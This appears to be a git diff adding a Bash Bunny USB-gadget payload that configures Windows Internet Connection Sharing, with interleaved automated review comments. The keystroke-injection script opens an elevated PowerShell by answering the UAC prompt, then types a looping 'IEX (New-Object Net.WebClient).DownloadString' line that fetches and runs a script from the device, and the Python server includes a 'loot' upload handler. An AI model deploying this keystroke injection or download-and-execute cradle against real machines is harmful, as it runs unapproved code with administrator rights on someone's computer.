diff --git a/payloads/library/general/Windows NIC Sharing/p.ps1 b/payloads/library/general/Windows NIC Sharing/p.ps1
new file mode 100644
index 00000000..84f8a801
--- /dev/null
+++ b/payloads/library/general/Windows NIC Sharing/p.ps1
@@ -0,0 +1,56 @@
+# Set up and configure NIC to share internets with BB
+# Credit to wiki.bashbunny.com for the outline
+# Credit to Wasabi Fan on technet for the Com-Object stuff
+
+Clear-Host
+# Share Internet connection
+Write-Output "Configuring Bash Bunny for internet usage..."
+Write-Output "Getting WMI info on NICs..."
+$BBWMIAdapter = (Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter 'MACAddress = "00:11:22:33:44:55"')
+$WMIAdapters = (Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter 'MACAddress<>"00:11:22:33:44:55"') | %{ if ($_.IPAddress -ne $null) {$_}}
+# Get Target GUID (shareable NIC)
+# This is an imperfect method of getting the GUID, I'm just assuming that no one has
+# more than 38 NICs on their Windows PC, and using it as an indicator of array dimensions
+if ((($WMIAdapters.SettingID).Length -gt 1) -and (($WMIAdapters.SettingID).Length -lt 38)){
+ $ETHGuid = $WMIAdapters[0].SettingID
+} else {
+ $ETHGuid = $WMIAdapters.SettingID
+}
+regsvr32 /s hnetcfg.dll # Register HNetCfg library
+$NetSharing = New-Object -ComObject HNetCfg.HNetShare # Create NetSharingManager object
+function share ($GUID, $Public) {
+ $Connection = $NetSharing.EnumEveryConnection | ?{ $NetSharing.NetConnectionProps.Invoke($_).Guid -eq $GUID } # Find Connection
+ $CfgSharing = $NetSharing.INetSharingConfigurationForINetConnection.Invoke($Connection) # Get sharing config
+ if ($Public) { $pubvar = 0 } else { $pubvar = 1 }
+ $CfgSharing.EnableSharing($pubvar) # Enable sharing with public (public = 0, private = 1)
+}
+function unshare ($GUID) {
+ $Connection = $NetSharing.EnumEveryConnection | ?{ $NetSharing.NetConnectionProps.Invoke($_).Guid -eq $GUID } # Find Connection
+ $NetSharing.INetSharingConfigurationForINetConnection.Invoke($Connection).DisableSharing() # Disable Sharing
+}
+Write-Output "Setting up interface sharing..."
+Write-Output "Setting up interface sharing on primary NIC...."
+share -GUID $ETHGuid -Public $true # Set live NIC to share public
+Write-Output "Setting up interface sharing on Bash Bunny...."
+share -GUID $BBWMIAdapter.SettingID -Public $false # Set Bash Bunny NIC to share private
+
+Write-Output "Setting static IP for bash buny NIC..."
+$BBWMIAdapter.EnableStatic('172.16.64.64','255.255.255.0')
+
+Clear-Host
+# Sharing should be done
+Write-Output "#########################################################"
+Write-Output "The Bash Bunny should now be able to access the internet"
+Write-Output "You should be able to ssh into your Bash Bunny at:"
+Write-Output "172.16.64.1"
+Write-Output "Hit ENTER to clean up network settings"
+Write-Output "#########################################################"
+Pause
+
+# Take down sharing
+Write-Output "Disabling interface sharing on primary NIC...."
+unshare -GUID $ETHGuid -Public $true # Stop public sharing on live NIC
+Write-Output "Disabling interface sharing on Bash Bunny...."
+unshare -GUID $BBWMIAdapter.SettingID # Stop private sharing on Bash Bunny NIC
+
+EXIT
diff --git a/payloads/library/general/Windows NIC Sharing/payload.txt b/payloads/library/general/Windows NIC Sharing/payload.txt
new file mode 100644
index 00000000..bf19038b
--- /dev/null
+++ b/payloads/library/general/Windows NIC Sharing/payload.txt
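Review bot: The cleanup call `unshare -GUID $ETHGuid -Public $true` passes a `-Public` argument that `unshare ($GUID)` does not declare, so PowerShell fails parameter binding on that line and sharing on the primary NIC is never disabled — the host is left with Internet Connection Sharing still enabled after the script exits; the line should read `unshare -GUID $ETHGuid`. Both `share` and `unshare` also pass `$Connection` straight into `INetSharingConfigurationForINetConnection.Invoke` without checking that the GUID lookup matched anything, so an empty or multi-element `$WMIAdapters` (the `.Length` check appears to be telling a single GUID string apart from an array, as the comment admits) yields a `$null` `$Connection` and an opaque COM exception. A guard after each lookup, `if ($null -eq $Connection) { throw "No connection found for GUID $GUID" }`, would fail with a readable message instead.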
@@ -0,0 +1,80 @@
+#!/bin/bash
+##############################################
+# Sharing Internet with Windows
+#
+# Auto-config sharing with Windows 10.
+##############################################
+
+# Other things to do once you have booted the
+# bash bunny as an ethernet enabled box
+#
+# Windows
+# Start > Run > "ncpa.cpl" Enter
+# (Open Network Connections)
+#Q DELAY 100
+#RUN WIN ncpa.cpl
+#Q DELAY 1000
+#Q ENTER
+
+# Identify Bash Bunny interface
+# Should be named:
+# "USB Ethernet/RNDIS Gadget"
+
+# Sharing is caring
+# Right-Click Ineternet interface click on
+# "Properties" and select "Sharing" tab
+#
+# From "Sharing" tab check
+# "Allow other netwrk usrs 2 connect... thru dis connection"
+# Select the Bash Bunny Gadget and hit "OK"
+# Right-click on Gadget and select "Properties"
+#
+# Generously gift an IP
+# Select TCP/IPv4 and click "Properties"
+# Set the IPv4=172.16.64.64 and Subnet=24-bit
+# Hit all the OKs
+
+# Or we could just have the Bash Bunny do all the work...
+LED SETUP
+SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
+
+# HID Attack Starts
+ATTACKMODE HID
+
+# UAC Bypass
+LED STAGE2
+DELAY 500
+Q GUI r
+Q DELAY 1000
+Q STRING powershell Start-Process powershell -Verb runAs
+Q DELAY 1000
+Q ENTER
+Q DELAY 1000
+Q ALT y
+Q DELAY 500
+Q ALT o
+Q DELAY 500
+Q LEFTARROW
+Q DELAY 100
+Q ENTER
+Q DELAY 1200
+Q ENTER
+Q DELAY 800
+
+LED SPECIAL2
+#Powershell Payload: first wait for connection to bunny webserver, then run network config
+#Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
+Q STRING "Start-Sleep -Seconds 15 ; while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1')}}"
+Q DELAY 300
+Q ENTER
+
+LED W
+# Ethernet Attack Starts
+ATTACKMODE RNDIS_ETHERNET
+LED CLEANUP
+Q DELAY 200
+LED B
+python $SWITCHDIR/server.py
+
+Q DELAY 5000
+LED FINISH
diff --git a/payloads/library/general/Windows NIC Sharing/readme.md b/payloads/library/general/Windows NIC Sharing/readme.md
new file mode 100644
index 00000000..1bbc8fe1
--- /dev/null
+++ b/payloads/library/general/Windows NIC Sharing/readme.md
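Review bot: The `# UAC Bypass` comment above `LED STAGE2` mislabels what the block does: `Start-Process powershell -Verb runAs` followed by `Q ALT y` requests elevation and answers the consent prompt with keystrokes, which is the opposite of a bypass and depends on the prompt being shown to an interactive administrator; `# Elevate PowerShell via the UAC consent prompt` would describe it accurately and matches the readme's "Running PowerShell as admin". The live `Q STRING` line also diverges from the commented-out variant directly above it — the active loop has no `;exit` after the download, so it keeps pinging and re-fetching after the first success — and keeping both copies makes it unclear which behaviour is intended; either document the intent in the `#Powershell Payload:` comment or delete the stale line. The `Q DELAY 200` and `Q DELAY 5000` after `ATTACKMODE RNDIS_ETHERNET` presumably no longer reach a HID device once the mode switches, so they look like leftovers worth confirming.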
@@ -0,0 +1,32 @@
+# Bash Bunny NIC Sharing from Windows
+* Author: hayze
+* Version: Version 0.1
+* Target: Windows 10
+
+## Description
+
+Sets up Networking for Bash Bunny. You should be able to SSH to the Bash Bunny
+at 172.16.64.1 once networking has been configured.
+
+## Configuration
+
+None needed.
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Magenta (solid) | Setting mode to HID |
+| Yellow (blinking) | Running PowerShell as admin |
+| Cyan (blinking) | Entering PowerShell IEX command |
+| White (solid) | Setting mode to RNDIS_ETHERNET |
+| White (blinking) | Running WebServer for IEX script |
+| Blue (solid) | Running PowerShell script |
+| Green | Windows should be configured to share |
+
+## Credits
+
+QDBA for the server py and readme layout
+Hak5 for the Windows sharing instructions
+Wasabi Fan on technet for the Com-Object stuff
+
diff --git a/payloads/library/general/Windows NIC Sharing/server.py b/payloads/library/general/Windows NIC Sharing/server.py
new file mode 100644
index 00000000..74b623de
--- /dev/null
+++ b/payloads/library/general/Windows NIC Sharing/server.py
@@ -0,0 +1,60 @@
+import os
+from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+
+
+IS_RUNNING = True
+abspath = os.path.abspath(__file__)
+CURR_DIR = os.path.dirname(abspath)
+os.chdir(CURR_DIR)
+
+class RequestServer(BaseHTTPRequestHandler):
+ def _set_headers(self):
+ self.send_response(200, "ok")
+ self.send_header('Content-type', 'text/plain')
+ self.protocol_version = 'HTTP/1.1'
+
+ def do_GET(self):
+ self.send_response(200, "ok")
+ self.send_header("Content-type", "text/plain")
+ self.end_headers()
+ try:
+ with open(CURR_DIR + self.path, 'r+') as f:
+ data = f.read()
+ self.wfile.write(data)
+ except IOError:
+ self.send_response(404)
+ self.wfile.write(CURR_DIR)
+ return
+
+ def do_POST(self):
+ global IS_RUNNING
+
+ self.send_response(200)
+ self.send_header("Content-type", "text/plain")
+ self.end_headers()
+ content_length = int(self.headers['Content-Length'])
+ filename = self.path[1:]
+
+ if filename == 'EOF':
+ data = self.rfile.read(content_length)
+ with open(CURR_DIR + "/loot/{}".format(filename), "w+") as f:
+ f.write(data)
+ f.close()
+ self.end_headers()
+ IS_RUNNING = False
+ else:
+ data = self.rfile.read(content_length)
+ with open(CURR_DIR + "/loot/{}.txt".format(filename), "w+") as f:
+ f.write(data)
+ f.close()
+ self._set_headers()
+
+def run(server_class=HTTPServer, handler_class=RequestServer, port=80):
+ server_address = ('', port)
+ httpd = server_class(server_address, handler_class)
+
+ while IS_RUNNING:
+ httpd.handle_request()
+
+if __name__ == '__main__':
+ run()
\ No newline at end of file
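Review bot: `do_GET` opens `CURR_DIR + self.path` without normalising or validating the request path, so any client on the RNDIS link can walk out of the payload directory with `..` segments and read arbitrary files from the device, and `do_POST` has the same problem with `filename = self.path[1:]` spliced into the `/loot/` path for writing. The handler also commits a `200` status and headers before the file is opened, so the `send_response(404)` in the `IOError` branch is written into the body of an already-sent 200 response and leaks `CURR_DIR` to the caller. The rewrite below resolves the path under the payload directory, refuses anything that escapes it, and only sends the status line once the file has been read; the same resolution should be applied to the `filename` in `do_POST`. `run` also binds `('', port)`, i.e. every interface; if the server is only meant to answer the host on the USB link, binding to that interface's address would limit who can reach it.
```python
    def do_GET(self):
        # Resolve the request path under the payload directory and refuse anything that escapes it
        base = os.path.realpath(CURR_DIR)
        target = os.path.realpath(os.path.join(base, self.path.lstrip('/')))
        if not target.startswith(base + os.sep):
            self.send_error(403)
            return
        try:
            with open(target, 'r') as f:
                data = f.read()
        except IOError:
            self.send_error(404)
            return
        # Commit the status line only once the file is known to be readable
        self.send_response(200, "ok")
        self.send_header("Content-type", "text/plain")
        self.end_headers()
        self.wfile.write(data)
```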